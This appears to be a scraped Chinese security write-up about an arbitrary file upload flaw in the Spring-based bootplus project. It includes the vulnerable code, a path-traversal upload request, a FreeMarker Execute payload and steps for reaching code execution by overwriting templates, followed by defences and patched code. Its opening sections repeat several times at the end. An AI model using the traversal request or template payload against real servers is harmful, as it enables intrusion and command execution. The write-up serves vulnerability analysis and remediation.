Spring框架文件上传漏洞分析与利用扩展<\/h1>

漏洞概述<\/h2>
本文详细分析Spring框架中文件上传功能的安全风险，特别是如何通过文件上传漏洞实现getshell的技术思路。文章将涵盖漏洞原理、利用方法、防御措施等内容。<\/p>

漏洞发现<\/h2>
在审计bootplus项目时发现一个任意文件上传漏洞（GitHub issue #24），该漏洞允许攻击者上传任意文件到服务器指定位置。<\/p>

漏洞代码分析<\/h2>
漏洞出现在以下文件上传接口：<\/p>
@ResponseBody<\/span>
<\/span><\/span>@RequestMapping<\/span>(<\/span>value =<\/span> "\/upload"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>POST<\/span>)<\/span>
<\/span><\/span>public<\/span> R upload<\/span>(<\/span>Integer uploadType,<\/span> HttpServletRequest request)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    MultipartHttpServletRequest multipartRequest;<\/span>
<\/span><\/span>    if<\/span> (<\/span>ServletFileUpload.<\/span>isMultipartContent<\/span>(<\/span>request))<\/span> {<\/span>
<\/span><\/span>        multipartRequest =<\/span> (<\/span>MultipartHttpServletRequest)<\/span> request;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        return<\/span> R.<\/span>error<\/span>(<\/span>"请先选择上传的文件"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    String fileContextPath =<\/span> null<\/span>;<\/span>
<\/span><\/span>    Iterator<<\/span>String><\/span> ite =<\/span> multipartRequest.<\/span>getFileNames<\/span>();<\/span>
<\/span><\/span>    while<\/span> (<\/span>ite.<\/span>hasNext<\/span>())<\/span> {<\/span>
<\/span><\/span>        MultipartFile file =<\/span> multipartRequest.<\/span>getFile<\/span>(<\/span>ite.<\/span>next<\/span>());<\/span>
<\/span><\/span>        if<\/span> (<\/span>file ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            return<\/span> R.<\/span>error<\/span>(<\/span>"上传文件为空"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        String fileName =<\/span> file.<\/span>getOriginalFilename<\/span>();<\/span>
<\/span><\/span>        logger.<\/span>info<\/span>(<\/span>"上传的文件原名称:{}"<\/span>,<\/span> fileName);<\/span>
<\/span><\/span>        
<\/span><\/span>        String fileType =<\/span> fileName.<\/span>indexOf<\/span>(<\/span>"."<\/span>)<\/span> !=<\/span> -<\/span>1<\/span>
<\/span><\/span>                ?<\/span> fileName.<\/span>substring<\/span>(<\/span>fileName.<\/span>lastIndexOf<\/span>(<\/span>"."<\/span>)<\/span> +<\/span> 1<\/span>)<\/span> :<\/span> null<\/span>;<\/span>
<\/span><\/span>        logger.<\/span>info<\/span>(<\/span>"上传文件类型:{}"<\/span>,<\/span> StringUtils.<\/span>defaultString<\/span>(<\/span>fileType));<\/span>
<\/span><\/span>        
<\/span><\/span>        String trueFileName =<\/span> getTrueFileName(<\/span>fileName,<\/span> uploadType);<\/span>
<\/span><\/span>        fileContextPath =<\/span> FileUtils.<\/span>generateFileUrl<\/span>(<\/span>
<\/span><\/span>                MyWebAppConfigurer.<\/span>FILE_UPLOAD_PATH_EXT<\/span>,<\/span> trueFileName);<\/span>
<\/span><\/span>        
<\/span><\/span>        String uploadPath =<\/span> FileUtils.<\/span>generateFileUrl<\/span>(<\/span>
<\/span><\/span>                applicationProperties.<\/span>getFileConfig<\/span>().<\/span>getUploadPath<\/span>(),<\/span> trueFileName);<\/span>
<\/span><\/span>        logger.<\/span>debug<\/span>(<\/span>"存放文件的路径:{}"<\/span>,<\/span> uploadPath);<\/span>
<\/span><\/span>        
<\/span><\/span>        File fileUpload =<\/span> FileUtils.<\/span>getFile<\/span>(<\/span>uploadPath);<\/span>
<\/span><\/span>        FileUtils.<\/span>forceMkdirParent<\/span>(<\/span>fileUpload);<\/span>
<\/span><\/span>        file.<\/span>transferTo<\/span>(<\/span>fileUpload);<\/span>
<\/span><\/span>        fileHandle(<\/span>fileUpload);<\/span>
<\/span><\/span>        break<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> R.<\/span>ok<\/span>().<\/span>put<\/span>(<\/span>"filePath"<\/span>,<\/span> fileContextPath);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>主要问题点<\/h3>

未校验文件类型<\/strong>：代码虽然获取了文件扩展名，但未进行任何白名单校验<\/li>
目录穿越风险<\/strong>：直接使用用户提供的文件名构造路径，未过滤..\/<\/code>等路径穿越字符<\/li>
未限制文件内容<\/strong>：对上传文件内容未做任何校验<\/li>
<\/ol>
漏洞利用<\/h2>
基本利用方法<\/h3>

构造包含路径穿越字符的文件名（如..\/..\/..\/1.txt<\/code>）<\/li>
上传文件到任意可写目录<\/li>
<\/ol>
示例HTTP请求：<\/p>
POST \/file\/upload HTTP\/1.1
Host: 127.0.0.1:7878
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryNRCAxJ6FTDUcBwrC

------WebKitFormBoundaryNRCAxJ6FTDUcBwrC
Content-Disposition: form-data; name="file"; filename="..\/..\/..\/1.txt"
Content-Type: application\/octet-stream

aaaaa
------WebKitFormBoundaryNRCAxJ6FTDUcBwrC--
<\/code><\/pre>
高级利用 - 覆盖模板文件实现RCE<\/h3>
由于Spring项目默认不解析JSP，传统上传JSP马的方法无效。但可以通过覆盖模板文件实现RCE：<\/p>

识别模板引擎<\/strong>：目标系统使用FreeMarker模板引擎<\/li>
定位模板文件<\/strong>：模板文件位于src\/main\/resources\/templates\/<\/code><\/li>
构造恶意模板<\/strong>：覆盖原有模板文件，插入FreeMarker命令执行代码<\/li>
<\/ol>
FreeMarker命令执行原理<\/h4>
FreeMarker支持通过?new<\/code>实例化某些Java类，特别是freemarker.template.utility.Execute<\/code>类可用于执行系统命令。<\/p>
示例恶意模板内容：<\/p>
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") }
<\/code><\/pre>
利用步骤<\/h4>

上传覆盖模板文件<\/li>
访问不存在的路由触发错误页面，执行模板中的恶意代码<\/li>
<\/ol>
利用条件与限制<\/h2>

JAR包部署<\/strong>：如果项目以JAR包形式运行，修改classpath:\/templates\/<\/code>中的模板不会生效，因为JAR包中的资源是只读的<\/li>
WAR包部署<\/strong>：如果是WAR包部署到Tomcat，则可以直接上传JSP文件，无需覆盖模板<\/li>
文件权限<\/strong>：需要目标目录有写入权限<\/li>
<\/ol>
防御措施<\/h2>


文件名过滤<\/strong>：<\/p>

过滤..\/<\/code>等路径穿越字符<\/li>
使用白名单限制文件扩展名<\/li>
<\/ul>
<\/li>

文件内容校验<\/strong>：<\/p>

校验文件头与扩展名是否匹配<\/li>
对图片等文件进行重采样处理<\/li>
<\/ul>
<\/li>

存储安全<\/strong>：<\/p>

将上传文件存储在Web根目录外<\/li>
使用随机文件名，不保留原始文件名<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制上传目录的权限<\/li>
对上传功能进行身份验证<\/li>
<\/ul>
<\/li>

框架配置<\/strong>：<\/p>

禁用FreeMarker的危险功能：freemarker.template.utility.Execute<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
修复代码示例<\/h2>
@ResponseBody<\/span>
<\/span><\/span>@RequestMapping<\/span>(<\/span>value =<\/span> "\/upload"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>POST<\/span>)<\/span>
<\/span><\/span>public<\/span> R upload<\/span>(<\/span>Integer uploadType,<\/span> HttpServletRequest request)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 验证是否为multipart请求
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>ServletFileUpload.<\/span>isMultipartContent<\/span>(<\/span>request))<\/span> {<\/span>
<\/span><\/span>        return<\/span> R.<\/span>error<\/span>(<\/span>"请先选择上传的文件"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    MultipartHttpServletRequest multipartRequest =<\/span> (<\/span>MultipartHttpServletRequest)<\/span> request;<\/span>
<\/span><\/span>    String fileContextPath =<\/span> null<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 只处理第一个文件
<\/span><\/span><\/span><\/span>    MultipartFile file =<\/span> multipartRequest.<\/span>getFile<\/span>(<\/span>multipartRequest.<\/span>getFileNames<\/span>().<\/span>next<\/span>());<\/span>
<\/span><\/span>    if<\/span> (<\/span>file ==<\/span> null<\/span> ||<\/span> file.<\/span>isEmpty<\/span>())<\/span> {<\/span>
<\/span><\/span>        return<\/span> R.<\/span>error<\/span>(<\/span>"上传文件为空"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取安全的文件名
<\/span><\/span><\/span><\/span>    String fileName =<\/span> getSafeFileName(<\/span>file.<\/span>getOriginalFilename<\/span>());<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 验证文件扩展名
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>isAllowedExtension(<\/span>fileName))<\/span> {<\/span>
<\/span><\/span>        return<\/span> R.<\/span>error<\/span>(<\/span>"不允许的文件类型"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 生成随机存储文件名
<\/span><\/span><\/span><\/span>    String storageName =<\/span> UUID.<\/span>randomUUID<\/span>().<\/span>toString<\/span>()<\/span> +<\/span> getExtension(<\/span>fileName);<\/span>
<\/span><\/span>    String uploadPath =<\/span> applicationProperties.<\/span>getFileConfig<\/span>().<\/span>getUploadPath<\/span>()<\/span> +<\/span> File.<\/span>separator<\/span> +<\/span> storageName;<\/span>
<\/span><\/span>    
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        \/\/ 创建父目录
<\/span><\/span><\/span><\/span>        File destFile =<\/span> new<\/span> File(<\/span>uploadPath);<\/span>
<\/span><\/span>        File parent =<\/span> destFile.<\/span>getParentFile<\/span>();<\/span>
<\/span><\/span>        if<\/span> (!<\/span>parent.<\/span>exists<\/span>())<\/span> {<\/span>
<\/span><\/span>            parent.<\/span>mkdirs<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 传输文件
<\/span><\/span><\/span><\/span>        file.<\/span>transferTo<\/span>(<\/span>destFile);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 返回相对路径
<\/span><\/span><\/span><\/span>        fileContextPath =<\/span> "\/uploads\/"<\/span> +<\/span> storageName;<\/span>
<\/span><\/span>        return<\/span> R.<\/span>ok<\/span>().<\/span>put<\/span>(<\/span>"filePath"<\/span>,<\/span> fileContextPath);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> R.<\/span>error<\/span>(<\/span>"文件上传失败"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 安全文件名处理
<\/span><\/span><\/span><\/span>private<\/span> String getSafeFileName<\/span>(<\/span>String fileName)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>fileName ==<\/span> null<\/span>)<\/span> return<\/span> "file"<\/span>;<\/span>
<\/span><\/span>    \/\/ 移除路径信息
<\/span><\/span><\/span><\/span>    fileName =<\/span> fileName.<\/span>substring<\/span>(<\/span>fileName.<\/span>lastIndexOf<\/span>(<\/span>'\/'<\/span>)<\/span> +<\/span> 1<\/span>);<\/span>
<\/span><\/span>    fileName =<\/span> fileName.<\/span>substring<\/span>(<\/span>fileName.<\/span>lastIndexOf<\/span>(<\/span>'\\'<\/span>)<\/span> +<\/span> 1<\/span>);<\/span>
<\/span><\/span>    \/\/ 替换特殊字符
<\/span><\/span><\/span><\/span>    return<\/span> fileName.<\/span>replaceAll<\/span>(<\/span>"[^a-zA-Z0-9\\.\\-]"<\/span>,<\/span> "_"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 扩展名白名单
<\/span><\/span><\/span><\/span>private<\/span> boolean<\/span> isAllowedExtension<\/span>(<\/span>String fileName)<\/span> {<\/span>
<\/span><\/span>    String[]<\/span> allowed =<\/span> {<\/span>"jpg"<\/span>,<\/span> "png"<\/span>,<\/span> "gif"<\/span>,<\/span> "pdf"<\/span>,<\/span> "txt"<\/span>};<\/span>
<\/span><\/span>    String ext =<\/span> getExtension(<\/span>fileName).<\/span>toLowerCase<\/span>();<\/span>
<\/span><\/span>    for<\/span> (<\/span>String a :<\/span> allowed)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>a.<\/span>equals<\/span>(<\/span>ext))<\/span> {<\/span>
<\/span><\/span>            return<\/span> true<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> false<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> String getExtension<\/span>(<\/span>String fileName)<\/span> {<\/span>
<\/span><\/span>    int<\/span> dot =<\/span> fileName.<\/span>lastIndexOf<\/span>(<\/span>'.'<\/span>);<\/span>
<\/span><\/span>    return<\/span> (<\/span>dot ==<\/span> -<\/span>1<\/span>)<\/span> ?<\/span> ""<\/span> :<\/span> fileName.<\/span>substring<\/span>(<\/span>dot +<\/span> 1<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
Spring框架文件上传功能如果实现不当，可能导致严重的安全问题。通过本文分析，我们了解到：<\/p>

简单的文件上传漏洞可能被扩展为RCE<\/li>
模板覆盖是一种有效的getshell方法，但受部署方式限制<\/li>
防御需要从文件名处理、内容校验、存储位置等多方面入手<\/li>
<\/ol>
开发人员应始终遵循最小权限原则，对用户上传内容保持高度警惕，实施多层防御措施来保护系统安全。<\/p>
Spring框架文件上传漏洞分析与利用扩展<\/h1>

漏洞概述<\/h2> 本文详细分析Spring框架中文件上传功能的安全风险，特别是如何通过文件上传漏洞实现getshell的技术思路。文章将涵盖漏洞原理、利用方法、防御措施等内容。<\/p>

漏洞发现<\/h2> 在审计bootplus项目时发现一个任意文件上传漏洞（GitHub issue #24），该漏洞允许攻击者上传任意文件到服务器指定位置。<\/p>

漏洞利用<\/h2>

漏洞概述<\/h2>
本文详细分析Spring框架中文件上传功能的安全风险，特别是如何通过文件上传漏洞实现getshell的技术思路。文章将涵盖漏洞原理、利用方法、防御措施等内容。<\/p>

漏洞发现<\/h2>
在审计bootplus项目时发现一个任意文件上传漏洞（GitHub issue #24），该漏洞允许攻击者上传任意文件到服务器指定位置。<\/p>
